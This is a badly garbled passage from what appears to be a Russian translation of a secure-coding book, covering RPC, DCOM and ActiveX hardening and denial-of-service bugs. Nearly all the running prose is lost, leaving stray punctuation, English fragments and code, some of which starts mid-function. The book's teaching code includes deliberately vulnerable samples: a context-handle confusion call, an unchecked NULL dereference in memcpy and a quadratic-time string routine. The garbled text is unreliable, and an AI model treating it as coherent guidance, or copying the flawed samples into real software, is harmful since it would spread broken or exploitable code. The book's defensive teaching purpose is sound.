.
IPv6 . ,
( IPv4) ,
. 64
IPv6
.
, ,
. , Windows .NET
Server 2003 .
,
.
,
. :
, .
, ,
.
16
RPC,
ActiveX-
DCOM
. , API;
API LsaLookupSids,
LSA RPC.
Malformed Security Identifier Request (
) http://www.microsoft.com/technet/security/bulletin/
ms99057.asp.
135
Windows NT 3.51/NT 4 RP,
, 100 ,
.
telnet 135,
. Telnet to Port 135
Causes 100 Percent CPU Usage ( Telnet 135 100
) Microsoft Knowledge Base (http://support
.microsoft.com/support/kb/articles/Q162/5/67.asp).
, Microsoft 2001 .
Malformed RPC Request Can Cause Service Failure ( RPC
), RPC (stubs),
, DoS.
http://www.microsoft.com/technet/security/bulletin/ms01041.asp.
RPC
RPC.
RPC,
RPC.
RPC .
RPC
RPC (Remote Procedure Call)
, .
,
RPC (RPC runtime) ,
.
RPC C
C++. ,
(, Perl, Microsoft JScript Microsoft Visual Basic) RPC
COM DCOM.
Microsoft Windows RPC
OSF RPC (Open Software Foundation RPC),
, UNIX Apple.
Windows [ Print Spooler (
), Event Log ( ), Remote Registry (
RPC-
RPC .
RPC
, RPC . RPC
:
;
;
( .idl);
( .acf).
C/C++.
: RPC, , RPC.
RPC, ,
, RPC. IDL.
( ,
),
. ACF
RPC, .
RPC .
1. IDL ACF Midl.exe.
: RPC .
2. RPC. :
, .
3. RPC
( Rpcrt4.lib).
4. RPC. ,
.
5. RPC
( Rpcrt4.lib).
! , (. 161).
( ) Phone,
Phonec.c, Phones.c, IDL ACF
Phone.idl Phone.acf. Phone.idl
Midl.exe : Phone.h
RPC Phone_c.c Phone_s.c. Phonec.c Phone_c.c
Ppcrt4.lib,
Phonec.exe. , Phones.c
Phone_s.c Ppcrt4.lib
Phones.exe.
Phone.idl
Phone.acf
Phone_c.c
Phone_s.c
Midl.exe
Link.exe
Phonec.exe
161.
Link.exe
Phonec.c
Phone.h
Phones.c
Phones.exe
RPC
, !
Phne Secureco2\Chapter16\RPC.
RPC-
RPC,
, , (marsalling)
.
, RPC
. ,
.
,
.
RPC
,
TCP/IP. : , ,
RPC.
(bind) ,
.
,
, (protocol sequences), .
. . 161
.
Table 16-1. Common RPC protocol sequences

    ncacn_np        Named pipes
    ncalrpc         Local RPC (same machine only)
    ncacn_ip_tcp    TCP/IP
. ,
.
RpcStringBindingCompose builds the string binding from its parts. For
example, the binding ncacn_np:northwindtraders[\\pipe\\phone] is composed
from:
LPBYTE pszUuid             = (LPBYTE)NULL;
LPBYTE pszProtocolSequence = (LPBYTE)"ncacn_np";
LPBYTE pszNetworkAddress   = (LPBYTE)"northwindtraders";
LPBYTE pszEndpoint         = (LPBYTE)"\\pipe\\phone";
LPBYTE pszOptions          = (LPBYTE)NULL;
LPBYTE pszStringBinding    = (LPBYTE)NULL;
RPC
: RPC
. ,
;
.
, .
,
cookie Web.
: RPC :
.
. .
.
RPC
. RPC :
DoS,
RPC, RPC
;
:
;
:
.
r ?
/robust MIDL-
Windows 2000 MIDL (Microsoft
Interface Definition Language) /robust.
, RPC
. ,
, RPC. ,
.
Windows 2000
, .
.
Windows 2000.
RPC Windows NT 4,
: Windows NT 4 Windows 2000 .
: /robust
MIDL.
/robust ,
.
[range]
IDL
, . , IDL
(blob) :
[range]. lo hi
0 1023, , ,
ppData, 1023 .
DoS
. ,
.
,
.
, , ,
. DoS ? :
, ,
. ,
, ,
! RPC
.
,
.
, ,
, . ,
, ,
.
.
RPC
( )
: (
) .
. ,
.
,
RpcBindingSetAuthInfo.
.
status = RpcBindingSetAuthInfo(
    phone_Handle,
    szSPN,                           // Kerberos SPN of the server
    RPC_C_AUTHN_LEVEL_PKT_PRIVACY,
    RPC_C_AUTHN_GSS_NEGOTIATE,
    NULL,
    0);
, szSPN, (service principal name,
SPN), . , AuthnLevel,
RPC_C_AUTHN_LEVEL_PKT_PRIVACY , ,
,
. . 162
RPC.
Table 16-2. RPC authentication levels (AuthnLevel)

RPC_C_AUTHN_LEVEL_DEFAULT
    Use the default level of the chosen authentication service. Beware:
    for some services the default is RPC_C_AUTHN_LEVEL_CONNECT, and with
    RPC_C_AUTHN_LEVEL_NONE there is no security at all!

RPC_C_AUTHN_LEVEL_NONE
    No authentication.

RPC_C_AUTHN_LEVEL_CONNECT
    Authenticate the client only when it first connects to the server.

RPC_C_AUTHN_LEVEL_CALL
    Authenticate at the start of each RPC call. On connection-oriented
    transports (the ncacn protocol sequences) this is treated as
    RPC_C_AUTHN_LEVEL_PKT.

RPC_C_AUTHN_LEVEL_PKT
    Authenticate, and verify that every packet received comes from the
    expected client.

RPC_C_AUTHN_LEVEL_PKT_INTEGRITY
    As RPC_C_AUTHN_LEVEL_PKT, and additionally verify that no packet has
    been modified in transit (see Chapter 6 on tamper detection).

RPC_C_AUTHN_LEVEL_PKT_PRIVACY
    As RPC_C_AUTHN_LEVEL_PKT_INTEGRITY, and additionally encrypt the
    argument values of every call.
: RpcBinding
SetAuthInfo
,
.
,
.
RpcServerRegisterAuthInfo:
status = RpcServerRegisterAuthInfo(
szSPN,
RPC_C_AUTHN_GSS_NEGOTIATE,
NULL,
NULL);
Windows , AuthnSvc,
.
RPC_C_AUTHN_GSS_WINNT, NTLM
. , Windows 2000
RPC_C_AUTHN_GSS_NEGOTIATE:
: NTLM Kerberos.
RPC_C_AUTHN_GSS_KERBEROS, RPC_C_
AUTHN_GSS_NEGOTIATE ,
, Windows NT 4. ,
:
NTLM.
, RpcBindingInqAuthClient.
(NTLM Kerberos)
( , ,
..). .
// RPC server function: print the message and who sent it.
void Message(handle_t hPhone, unsigned char *szMsg) {
    RPC_AUTHZ_HANDLE hPrivs;
    DWORD dwAuthn;

    RPC_STATUS status = RpcBindingInqAuthClient(
        hPhone,
        &hPrivs,
        NULL,
        &dwAuthn,
        NULL,
        NULL);

    if (status != RPC_S_OK) {
        printf("RpcBindingInqAuthClient returned: 0x%x\n", status);
        RpcRaiseException(ERROR_ACCESS_DENIED);
    }

    // Refuse calls made below packet-level authentication, whatever
    // the client asked for.
    if (dwAuthn < RPC_C_AUTHN_LEVEL_PKT) {
        printf("Client authentication level is too low.\n");
        RpcRaiseException(ERROR_ACCESS_DENIED);
    }

    // RpcImpersonateClient takes the binding handle of this call.
    if (RpcImpersonateClient(hPhone) != RPC_S_OK) {
        printf("Failed to impersonate the client.\n");
        RpcRaiseException(ERROR_ACCESS_DENIED);
    }

    char szName[128+1];
    DWORD dwNameLen = 128;
    if (!GetUserName(szName, &dwNameLen))
        lstrcpy(szName, "<unknown>");

    printf("Message: %s\nfrom %s at authentication level %d\n",
           szMsg, szName, dwAuthn);

    RpcRevertToSelf();
}
. Message
.
RpcBindingInqAuthClient AuthnLevel.
AuthnLevel
, ,
, .
. ,
.
, ,
. Windows .NET Server 2003
(
).
Windows .NET Server 2003 Impersonate a client after
authentication ( )
, ,
.
Kerberos
szSPN, RpcBindingSetAuthInfo,
, Kerberos.
: Kerberos
, NTLM .
. Kerberos, szSPN
NULL.
DsMakeSPN. Ntdsapi.h
Ntdsapi.dll. DsMa
keSPN.
. RPC
? Microsoft Platform SDK
RPC RPCSvc,
RPC.
.
Windows XP Professional, Windows .NET Server 2003
500 256 .
,
100 . . 163
, :
TCP/IP.
Table 16-3. RPC timing at different AuthnLevel settings, named pipes
versus TCP/IP (figures as measured in the original test)

    AuthnLevel                       Named pipes     TCP/IP
                                     (ncacn_np)      (ncacn_ip_tcp)
    RPC_C_AUTHN_LEVEL_NONE           1926            1051
    RPC_C_AUTHN_LEVEL_CONNECT        2023            1146
    RPC_C_AUTHN_LEVEL_PKT_PRIVACY    2044            1160
,
. 10%,
. :
RPC_C_AUTHN_LEVEL_CONNECT RPC_C_AUTHN_LEVEL_
PKT_PRIVACY . RPC_C_AUTHN_
LEVEL_CONNECT, RPC_C_AUTHN_LEVEL_PKT_PRIVACY.
.
RPC,
.
! 2000 .
Microsoft
,
RPC.
, (
RpcBindingSetAuthInfo)
. ( )
,
. ,
: ,
, . ,
,
RPC DCOM.
. 162 RPC_C_AUTHN_LEVEL_NO
NE, . 163 RPC_C_AUTHN_LEVEL_PKT_PRIVACY.
, (strict
handle). DoS.
.
, . [strict_con
text_handle] ACF ,
, .
. 163. RPC
RPC_C_AUTH_LEVEL_PKT_PRIVACY. ,
,
,
. IDL,
RPC :
.
interface PrinterOperations {
    typedef context_handle void *PRINTER_CONTEXT;
    void OpenPrinter([in, out] PRINTER_CONTEXT *ctx);
    void UsePrinter([in] PRINTER_CONTEXT ctx);
    void ClosePrinter([in, out] PRINTER_CONTEXT *ctx);
}

interface FileOperations {
    typedef context_handle void *FILE_CONTEXT;
    void OpenFile([in, out] FILE_CONTEXT *ctx);
    void UseFile([in] FILE_CONTEXT ctx);
    void CloseFile([in, out] FILE_CONTEXT *ctx);
}
++ RPC:
void *ctxAttacker;
OpenPrinter(&ctxAttacker);
UseFile(ctxAttacker);
UseFile(ctxAttacker)
FILE_CONTEXT, PRINTER_CONTEXT.
ACF,
[strict_context_handle]:
[explicit_handle, strict_context_handle]
interface PrinterOperations{}
interface FileOperations{}
RPC ,
PrinterOperations FileOperations
.
.
,
RPC.
, .
,
.
, ,
.
,
, .
,
,
.
RPC ,
( ,
), ,
. , RPC
.
, ( RPC
)
, ,
, ,
.
,
, ,
,
.
(NULL)
(
), ,
DoS.
NULL, :
        sErr = -1;
    }
    return sErr;
}

short CloseFileByID(handle_t hBinding, PPCONTEXT_HANDLE_TYPE pphCtx) {
    FILE_ID *pFid = (FILE_ID *)*pphCtx;
    pFid->hFile = NULL;
    midl_user_free(pFid);
    *pphCtx = NULL;
    return 0;
}
OpenFileByID. ,
,
. , RpcImpersonateClient Open
IDFile , pphCtx NULL.
CloseFileByID ReadFileByID,
.
RPC ,
NULL, .
if (*pphCtx == NULL) {
// .
}
RPC,
. RPC
,
, .
RPC ,
Identify ().
RpcBindingSetAuthInfoEx:
// .
RPC_SECURITY_QOS qosSec;
qosSec.Version = RPC_C_SECURITY_QOS_VERSION;
qosSec.Capabilities = RPC_C_QOS_CAPABILITIES_DEFAULT;
qosSec.IdentityTracking = RPC_C_QOS_IDENTITY_STATIC;
qosSec.ImpersonationType = RPC_C_IMP_LEVEL_IDENTIFY;
status = RpcBindingSetAuthInfoEx(..., &qosSec);
ImpersonationType :
RPC_C_IMP_LEVEL_ANONYMOUS ( ,
), RPC_C_IMP_ LEVEL_IDENTIFY (
), RPC_C_IMP_LEVEL_IMPERSONATE RPC_C_IMP_LEVEL_DELE
GATE ( , ,
).
RPC
. RPC RpcServer
RegisterIf RpcServerRegisterIf2 RpcServerRegisterIfEx,
, ,
RPC ,
.
RPC_C_AUTHN_LEVEL_PKT .
/*
  Phones.cpp
*/
...
// Security callback: the RPC runtime invokes it before dispatching a
// client call to this interface.
RPC_STATUS RPC_ENTRY SecurityCallBack(RPC_IF_HANDLE idIF, void *ctx) {
    RPC_AUTHZ_HANDLE hPrivs;
    DWORD dwAuthn;

    RPC_STATUS status = RpcBindingInqAuthClient(
        ctx,
        &hPrivs,
        NULL,
        &dwAuthn,
        NULL,
        NULL);

    if (status != RPC_S_OK) {
        printf("RpcBindingInqAuthClient returned: 0x%x\n", status);
        return ERROR_ACCESS_DENIED;
    }

    // Refuse any call made below packet-level authentication.
    if (dwAuthn < RPC_C_AUTHN_LEVEL_PKT) {
        printf("Client authentication level is too low.\n");
        return ERROR_ACCESS_DENIED;
    }

    return RPC_S_OK;
}
...
void main() {
    ...
    status = RpcServerRegisterIfEx(phone_v1_0_s_ifspec,
                                   NULL,
                                   NULL,
                                   0,
                                   RPC_C_LISTEN_MAX_CALLS_DEFAULT,
                                   SecurityCallBack);
    ...
}
MSDN Platform SDK
: <_>(RPC_IF_ID interface, void context)
<_>(RPC_IF_HANDLE interface, void context).
, RpcServer
RegisterIfEx RpcServerRegisterIf2 RPC_IF_ALLOW_SECU
RE_ONLY. :
, RPC_C_AUTHN_LEVEL_NONE.
RPC_S_ACCESS_DENIED.
. ,
, RPC
, .
,
. : Windows NT 4/2000
( ) , Windows XP
.
RPC_IF_ALLOW_SECURE_ONLY ,
RpcServerUseProtSeq,
. , ,
LRPC.
TCP/IP . ,
, .
RPC-
, RPC ,
. RPC
.
, ,
.
RPC (
, RPC),
. ,
RPC: RPC1, LRPC, RPC2,
, RPC3, LRPC,
( , LRPC )
(. 164).
MyService.exe
MyService.exe
RPC 1
RPC 2
LRPC
RPC 3
LRPC
RPC 1
, LRPC
RPC 2
RPC 3
, LRPC
, LRPC
. 164. RPC
, , , LRPC,
RPC
, RPC
!
,
, RpcBindingToStringBinding,
RpcStringBindingParse
. :
, LRPC.
/*
  Phones.cpp
*/
...
// Returns TRUE if the client on this binding came in over local RPC
// (ncalrpc), i.e. from the same machine.
BOOL IsLRPC(void *ctx) {
    BOOL fIsLRPC = FALSE;
    LPBYTE pBinding = NULL;

    if (RpcBindingToStringBinding(ctx, &pBinding) == RPC_S_OK) {
        LPBYTE pProtSeq = NULL;

        // Only the protocol sequence is of interest; pass NULL for the
        // parts of the binding we do not need.
        if (RpcStringBindingParse(pBinding,
                                  NULL,
                                  &pProtSeq,
                                  NULL,
                                  NULL,
                                  NULL) == RPC_S_OK) {
            printf("Protocol sequence is %s\n", pProtSeq);

            // Local RPC uses the ncalrpc protocol sequence.
            if (lstrcmpi((LPCTSTR)pProtSeq, "ncalrpc") == 0)
                fIsLRPC = TRUE;

            if (pProtSeq)
                RpcStringFree(&pProtSeq);
        }

        if (pBinding)
            RpcStringFree(&pBinding);
    }

    return fIsLRPC;
}
...
...
,
! RPC
RpcEpRegister .
(, RPCDump.exe Windows 2000
Resource Kit) .
: ncacn_ip_tcp, ncacn_np
ncalrpc.
.
RPC , GetLastError
RPC . , ,
, 5
! .
net helpmsg nnnn, nnnn
, .
DCOM
DCOM RPC, COM
, , RPC,
. ,
, DCOM ,
, .
. , !
DCOM
Dcomcnfg.exe. Windows NT 4 Win
dows 2000 Distributed COM Configuration Properties
(: Distributed COM), Windows XP ,
COM+ DCOM. . 165
Default Properties ( )
Distributed COM Configuration Properties Windows 2000.
RPC.
Connect (), RPC_C_AUTHN_CONNECT.
Identify (),
RPC_C_IMP_LEVEL_IDENTIFY.
Default Properties Provide additional security for
reference tracking ( ).
COM.
IUnknown::AddRef, IUnknown::Release.
IUnknown::AddRef,
, , .
, COM ,
, , IUnknown::AddRef
,
. ,
? ,
, :
.
CoInitializeSecurity,
EOAC_SECURE_REFS dwCapabilities.
Default Security ( )
, .
, ,
,
, .
, DCOM
. ,
, DCOM,
.
Administrators () Power
Users ( ). , Power Users Win
dows 2000, Windows NT, ,
.
, , , , ,
. ,
. ,
: Power Users
, .
Windows NT 4 SP 4 Default Protocols (
) , DCOM.
TCP UDP
[ ConnectionOriented
TCP/IP ( TCP/IP) Datagram UDP/IP (
UDP/IP)]. DCOM
, TCP
, .
, ,
.
Applications () Distributed COM Confi
guration Properties ,
HKEY_LOCAL_MACHINE\Software\Classes\AppId. :
, .
, ,
, .
,
. :
,
DLL. ,
, DCOM
. ,
. , TCP UDP,
.
DCOM
( 135 )
, . :
Windows 2000, ,
.
DCOM
. ,
, . , ,
.
DCOM
DCOM
. : ,
, , SYS
TEM ( DCOM,
) . ,
DCOM, () ,
, .
.
DCOM .
.
,
.
,
. , :
, Windows 2000,
. DCOM
Windows NT 4.0,
. Windows 2000
,
. , ,
(window station) ,
. Platform SDK.
, ,
. ,
, DCOM
, ,
. ,
. API
.
, , DCOM
. ,
DCOM
,
,
. .
DCOM
Local System , Windows XP,
. Local System ,
.
, , .
. DCOM
, ( )
Identify.
. DCOM
Identify,
CoInitializeSecurity API
Impersonate.
, Windows .NET Server
,
7.
Microsoft Transaction Server ,
. ,
. , ,
. ,
DCOM, Log on as a batch job (
). Dcomcnfg.exe
,
, .
,
.
. DCOM
. ,
? :
LSA.
: 3000 ,
. 3000 ,
. ,
,
99,9% (
1000 ). , 3000
, (0,999) 3000, 0,05.
18 ,
. ,
.
DCOM
. ,
(, ),
.
, : 20
, 3000.
.
.
,
(
). SMS (Systems Management Server)
, .
, ,
, .
! , , ,
,
. , , Windows XP Windows .NET Server
LocalService NetworkService.
.
DCOM
, . CoInitializeSecurity
,
, IClientSecurity::SetBlanket.
, COM ,
(blanket).
, CoInitializeSecurity.
HRESULT CoInitializeSecurity(
    PSECURITY_DESCRIPTOR pVoid,              // access permissions: a security descriptor,
                                             // an AppID GUID or an IAccessControl object
    LONG cAuthSvc,                           // number of entries in asAuthSvc (-1 lets COM choose)
    SOLE_AUTHENTICATION_SERVICE * asAuthSvc, // authentication services the server accepts
    void * pReserved1,                       // reserved, must be NULL
    DWORD dwAuthnLevel,                      // default authentication level
                                             // for proxies and incoming calls
    DWORD dwImpLevel,                        // default impersonation level
                                             // for proxies
    SOLE_AUTHENTICATION_LIST * pAuthList,    // per-service authentication
                                             // information (client side)
    DWORD dwCapabilities,                    // additional capabilities:
                                             // EOAC_* flags
    void * pReserved3                        // reserved, must be NULL
);
.
: ,
(application ID, AppID) IAccessControl.
PSECURITY_DESCRIPTOR,
dwCapabilities. AppID, ,
. ,
,
.
( NULL). Platform SDK
( , ,
) , , NULL,
dwAuthnLevel. .
.
, cAuthSvc 1.
dwAuthnLevel,
. ,
RPC_C_AUTHN_LEVEL_PKT_PRIVACY
.
.
, .
, .
,
.
,
, !
, RPC_C_IMP_LEVEL_IDENTIFY RPC_C_IMP_LEVEL_ANONYMOUS,
.
dwCapabilities.
EOAC_STATIC_CLOAKING EOAC_DYNAMIC_CLOAKING
Windows 2000 (cloaking).
, .
.
EOAC_SECURE_REFS.
, .
Windows 2000, EOAC_NO_CUSTOM_MARSHAL. DCOM
DLL.
EOAC_NO_CUSTOM_MARSHAL
CLSID, Ole32.dll (Component Services).
CLSID ,
COM. DCOM
(object references, OBJREF), CLSID.
CLSID
DLL. , EOAC_NO_CUSTOM_MARSHAL, CoInitializeSecurity
CLSID, CATID_Marshaler.
EOAC_DISABLE_AAA ,
,
E_ACCESSDENIED. ,
CoInitializeSecurity,
(, Local System),
. Windows 2000
.
DCOM (.
Secureco2\Chapter16\DCOM_Security). ATL COM AppWizard Microsoft Visual C++ 6
DCOM, ISecurityExample,
GetServerBlanket.
#include <windows.h>
#include <objidl.h>

// The line carrying the method's name and first parameters is missing
// from the page; this head is rebuilt from the body, which uses the four
// out-parameters AuthNSvc, AuthZSvc, AuthLevel and ImpLevel. In the sample
// this is the GetServerBlanket method of the ISecurityExample interface.
HRESULT GetServerBlanket(DWORD * AuthNSvc, DWORD * AuthZSvc,
                         DWORD * AuthLevel, DWORD * ImpLevel)
{
    IServerSecurity* pServerSecurity;
    OLECHAR* PriName;
    // CoGetCallContext only succeeds on the thread that is
    // currently servicing an incoming COM call.
    if(CoGetCallContext(IID_IServerSecurity,
                        (void**)&pServerSecurity) == S_OK)
    {
        HRESULT hr;
        // Ask for the security settings (the "blanket") the caller used.
        hr = pServerSecurity->QueryBlanket(AuthNSvc,
                                           AuthZSvc,
                                           &PriName,
                                           AuthLevel,
                                           ImpLevel,
                                           NULL,
                                           NULL);
        if(hr == S_OK)
        {
            // The caller's principal name is not needed here.
            CoTaskMemFree(PriName);
        }
        pServerSecurity->Release();
        return hr;
    }
    else
        return E_NOINTERFACE;
}
, :
, IserverSecurity
(blanket). .
TestClient ,
, IClientSecurity::SetBlanket,
, GetServerBlanket
. :
No authorization
Auth level = Packet privacy
Impersonation level = Anonymous
TestClient.exe DCOM_Security.exe . DCOM_Security.exe
DCOM_Security.exe /regserver. ,
. ,
, ,
. :
, .
DCOM , ,
Windows 2000,
. DCOM ,
. (connectable object).
(connection points) [
(Guy Eddon) (Henry Eddon) Inside Distributed COM
(Microsoft Press, 1998)] .
,
.
, .
,
Local System ,
.
(sink)
. ,
. ,
, DCOM, ,
, ,
.
.
,
( COM/DCOM).
IDispatch::Invoke .
, ,
, ,
.
ActiveX
Microsoft COM (Component Object Model)
. COM
,
IUnknown.
ActiveX COM,
IUnknown. IDispatch
(, Visual Basic Perl)
( , VBScript JScript)
, Automation. ActiveX
,
COM,
(, Web ).
ActiveX
ActiveX
Web
. Web ActiveX
HTML ,
HTML, (,
) ActiveX
. , Outlook 2002 ( Microsoft
Office XP) ActiveX
, , , Outlook Express Windows .NET Server 2003
Windows XP.
ActiveX , ,
, HTML (
HTML)
ActiveX.
HTML ( Web ) ActiveX ,
. , ,
(safe for initialization, SFI)
(safe for scripting, SFS),
.
ActiveX-,
ActiveX
COM IPersist.
, .
ActiveX,
, .
, ActiveX
, ,
. , ActiveX
, ,
Web.
, Microsoft Excel ,
,
.
, ActiveX
.
! ActiveX ,
Authenticode.
ActiveX
,
.
ActiveX, .
2001 . Web,
ActiveX.
, ,
. ,
, (, )
. , ActiveX Print,
! ,
, ActiveX
, Web,
,
.
, ? : Web
ActiveX,
. , Web
ActiveX Web, Print
.
, ActiveX
,
, .
Outlook View Control Exposes Unsafe Functionality (
Outlook
) (http://www.microsoft.com/technet/security/bulletin/MS01038.asp), Active Setup Control Vulnerability (
) (http://www.microsoft.com/technet/security/bulletin/MS99048.asp)
Office HTML Script and IE Script Vulnerabilities (,
HTML Office Internet
Explorer) (http://www.microsoft.com/technet/security/bulletin/MS00049.asp).
! , ActiveX,
.
,
ActiveX, .
ActiveX
, msdn.microsoft.com
safe for scripting.
!
SFI- SFS-
ActiveX,
/ , : ActiveX
!
, , ,
. , , ActiveX
, .
, ActiveX
.
! :
,
.
( )
,
.
ActiveX-?
, ActiveX, :
, .
,
, :
, ,
;
(, ,
);
,
;
;
(,
);
,
.
, ActiveX
.
,
, RunCode, PrintDoc, EraseFile, Shell, Call, Write, Read
. .
:
. ,
, ,
.
IObjectSafety.
( Internet Explorer) ,
.
(. 19).
, ActiveX
, . ,
ActiveX , Web
, northwindtraders.com.
.
1. IObjectWithSite SetSite,
(, Internet Explorer),
IUnknown (
Ocidl.h). IObjectWithSite ActiveX
.
2. :
pUnk->QueryInterface(IID_IServiceProvider, (void**)&pSP);
pSP->QueryService(SID_SWebBrowserApp, IID_IWebBrowser2, (void**)&pWB);
pWB->get_LocationURL(&bstrURL);
3. , , bstrURL
URL. .
, , northwindtraders.com (,
) . ,
www.northwindtraders.com.foo.com!
InternetCrackUrl Wininet.dll,
URL ( lpUrlComponent>lpszHostName),
.
(. Secureco2\Chapter 16\InternetCrackURL)
.
/*
   InternetCrackURL.cpp
*/
#include <windows.h>
#include <wininet.h>
#include <stdio.h>
#include <ctype.h>
#pragma comment(lib, "wininet.lib")

// Returns TRUE when the host in szURL is szValidDomain itself or a
// sub-domain of it (and, when fRequireHTTPS is set, the scheme is https).
BOOL IsValidDomain(char *szURL, char *szValidDomain,
                   BOOL fRequireHTTPS) {
    URL_COMPONENTSA urlComp;
    ZeroMemory(&urlComp, sizeof(urlComp));
    urlComp.dwStructSize = sizeof(urlComp);
    // Only the host name component is requested.
    char szHostName[128];
    urlComp.lpszHostName = szHostName;
    urlComp.dwHostNameLength = sizeof(szHostName);
    BOOL fRet = InternetCrackUrlA(szURL, 0, 0, &urlComp);
    if (fRet == FALSE) {
        printf("InternetCrackURL failed -> %lu\n", GetLastError());
        return FALSE;
    }
    // Reject anything but HTTPS when HTTPS is required.
    if (fRequireHTTPS && urlComp.nScheme != INTERNET_SCHEME_HTTPS)
        return FALSE;
    // Compare the tail of the host name with the valid domain,
    // character by character from the end (host names are case-insensitive).
    int cbHostName = lstrlenA(szHostName);
    int cbValid = lstrlenA(szValidDomain);
    // A host shorter than the domain can never match it.
    if (cbHostName < cbValid)
        return FALSE;
    for (int i = 1; i <= cbValid; i++)
        if (tolower((unsigned char)szHostName[cbHostName - i]) !=
            tolower((unsigned char)szValidDomain[cbValid - i]))
            return FALSE;
    // The match must sit on a label boundary: either the host is the domain
    // itself or the character just before the match is a dot. Without this
    // check a host that merely ends in the same letters would be accepted.
    if (cbHostName > cbValid && szHostName[cbHostName - cbValid - 1] != '.')
        return FALSE;
    return TRUE;
}

int main() {
    char *szURL = "https://www.northwindtraders.com/foo/default.html";
    char *szValidDomain = "northwindtraders.com";
    BOOL fRequireHTTPS = TRUE;
    if (IsValidDomain(szURL, szValidDomain, fRequireHTTPS)) {
        printf("The host of %s is within %s.\n", szURL, szValidDomain);
    }
    return 0;
}
IsValidDomain , ActiveX
, Web,
northwindtraders.com.
,
COM msdn.microsoft.com,
Microsoft Knowledge Base, HOWTO: Tie ActiveX Controls to a
Specific Domain ( ActiveX )
(support.microsoft.com/support/kb/articles/Q196/0/61.ASP), ATL
ActiveX .
SiteLock
Windows Office
2002 . SiteLock, ATL ++,
Web .
SiteLock ActiveX
,
, ActiveX
. SiteLock
ActiveX,
.
, ActiveX
.
SiteLock
http://msdn.microsoft.com/downloads/samples/internet/components/
sitelock/default.asp.
Kill Bit
,
ActiveX . ,
ActiveX
. Web
ActiveX :
. , . HKLM\Soft
ware\Microsoft\Internet Explorer ActiveX Compatibility,
ActiveX (CLSID).
ActiveX,
( ),
CLSID , REG_DWORD
Compatibility Flags 0x00000400. , .
ActiveX
, ,
ActiveX, .
Q240797 Microsoft Knowledge Base.
17
,
DoS, ,
.
. UDP
(UDP bomb) SunOS 4.x. UDP
, ,
. ,
(, UNIX , Windows
),
.
ping (Ping of Death),
IP. DoS
. IPv4:
struct ip_hdr
{
unsigned char ip_version:4,
ip_header_len:4;
unsigned char ip_type_of_service;
unsigned short ip_len;
unsigned short ip_id;
unsigned short ip_offset;
unsigned char ip_time_to_live;
unsigned char ip_protocol;
unsigned short ip_checksum;
struct in_addr ip_source, ip_destination;
};
ip_len .
(unsigned short) 65 535,
65 535 . ip_offset
.
, ,
, .
0, :
, . 13
.
8 , 65 535 .
? ,
( 65 535).
,
216.
, , ping (Ping
of Death),
, , http://www.insecure.org/sploits/pingodeath.html.
,
, . ,
: ,
. , DoS,
, , ,
.
.
/*
   Checks a list of IP fragments for an overflow of the total packet length
*/
#include <winsock2.h>
#include <list>
using namespace std;

// IPv4 header written out field by field so the widths are explicit.
// Only ip_len, ip_header_len and ip_offset are used below.
struct ip_hdr
{
    unsigned char ip_version:4,
                  ip_header_len:4;
    unsigned char ip_type_of_service;
    unsigned short ip_len;
    unsigned short ip_id;
    unsigned short ip_offset;
    unsigned char ip_time_to_live;
    unsigned char ip_protocol;
    unsigned short ip_checksum;
    struct in_addr ip_source, ip_destination;
};

typedef list<ip_hdr> FragList;

bool ReassemblePacket(FragList& frags, char** outbuf)
{
    // Assumes the caller has already validated each header,
    // sorted the fragments by offset and rejected overlaps.
    // Only the final size check is shown here.
    unsigned long packetlen = 0;
    // The offset of the last fragment plus its data length
    // is the size of the reassembled packet.
    unsigned short last_offset;
    unsigned short datalen;
    ip_hdr Packet;
    // In a sorted list the last fragment has the largest offset.
    Packet = frags.back();
    // The fragment offset is the low 13 bits, in units of 8 bytes.
    last_offset = (Packet.ip_offset & 0x1FFF) * 8;
    // Data length is the total length minus the header
    // (ip_header_len is in 32-bit words). Both values come off the wire!
    datalen = Packet.ip_len - Packet.ip_header_len * 4;
    // Add in an unsigned long so that the sum cannot wrap around.
    packetlen = (unsigned long)last_offset + (unsigned long)datalen;
    // Had packetlen been an unsigned short this input would wrap:
    //   offset  = 0xfff0;
    //   datalen = 0x0020;
    //   total   = 0x10010
    // which truncates to 0x0010, and the check below would pass
    // because 0x0010 fits in an unsigned short whose maximum is 0xffff.
    if(packetlen > 0xffff)
    {
        // Overflow! Drop the packet.
        return false;
    }
    // Allocate *outbuf and copy the fragments into it here.
    // ...
    return true;
}
:
. ,
,
Microsoft Office .
/* NULL pointer dereference that a remote caller can trigger */
#include <string.h>
#include <wchar.h>
typedef wchar_t WCHAR;   // stand-in for the Windows typedef
struct UNICODE_STRING
{
    WCHAR* buf;
    unsigned short len;
    unsigned short max_len;
};
void CopyString(UNICODE_STRING* pStr)
{
    WCHAR buf[20];
    // Is the string short enough for the local buffer?
    if(pStr->len < 20)
    {
        // pStr->buf is never checked: a caller that supplies len > 0
        // together with buf == NULL makes memcpy fault here.
        memcpy(buf, pStr->buf, pStr->len * sizeof(WCHAR));
    }
    // Do more work here.
}
, ,
NULL.
, . :
, . ,
RPC ,
. ,
pStr>buf NULL. ,
.
,
(
) . ,
. ,
: c:\\foo.txt
, c:\foo.txt . ,
,
? (.
Secureco2\Chapter17\CPUDoS):
/*
   CPU_DoS_Example.cpp
   Compares two ways of collapsing doubled backslashes and times each
   of them on inputs of increasing size to show how the naive version scales.
*/
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <assert.h>

/*
   The first version walks the string and, each time it finds "\\",
   shifts the remainder of the string down by one character.
   Returns true when at least one pair was collapsed.
*/
// Note: buf is modified in place.
bool StripBackslash1(char* buf)
{
    char* tmp = buf;
    bool ret = false;
    for(tmp = buf; *tmp != '\0'; tmp++)
    {
        if(tmp[0] == '\\' && tmp[1] == '\\')
        {
            // Shifting the rest of the string on every hit is the slow part:
            // each shift is O(n), so a string full of "\\" pairs costs O(n^2).
            // memmove is used because source and destination overlap,
            // which strcpy does not allow.
            memmove(tmp, tmp + 1, strlen(tmp + 1) + 1);
            ret = true;
        }
    }
    return ret;
}

/*
   The second version copies the input once into a scratch buffer,
   skipping the first backslash of every pair, so it runs in O(n).
   It needs a heap allocation, which the first version avoids.
*/
bool StripBackslash2(char* buf)
{
    unsigned long len, written;
    char* tmpbuf = NULL;
    char* tmp;
    bool foundone = false;
    len = strlen(buf) + 1;
    if(len == 1)
        return false;
    tmpbuf = (char*)malloc(len);
    // Out of memory: nothing useful can be done here.
    if(tmpbuf == NULL)
    {
        assert(false);
        return false;
    }
    written = 0;
    for(tmp = buf; *tmp != '\0'; tmp++)
    {
        if(tmp[0] == '\\' && tmp[1] == '\\')
        {
            // Skip this backslash; the next pass copies its twin.
